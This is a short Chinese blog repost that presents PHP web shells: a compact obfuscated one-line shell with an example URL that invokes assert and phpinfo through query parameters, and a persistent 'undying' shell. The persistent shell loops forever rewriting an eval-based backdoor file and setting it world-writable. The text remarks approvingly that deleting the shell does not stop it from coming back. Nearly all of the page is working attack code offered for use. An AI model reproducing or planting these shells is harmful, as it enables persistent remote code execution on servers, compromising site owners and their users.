标签:demo time [1] 方式 php @ val div limit 一句话
简洁的变形马
<?php @$_=$_GET[1].@$_($_GET[2])?>
利用方式
http://xxx.com/a.php?1=assert&2=phpinfo();
不死马
<?php set_time_limit(0); ignore_user_abort(true); $file = ‘demo.php‘; $shell = ‘<?php eval($_GET[1]);?>‘; while(1){ file_put_contents($file, $shell); system("chmod 777 demo.php"); usleep(50); } ?>
使用页面访问这个木马就会疯狂产生不死马,删不死马删不掉,立刻生成,更恶心的是,就算
把制造不死马的木马删了,只要页面没关闭,一样会产生不死马。
标签:demo time [1] 方式 php @ val div limit 一句话
原文地址:https://www.cnblogs.com/demonxian3/p/8996419.html
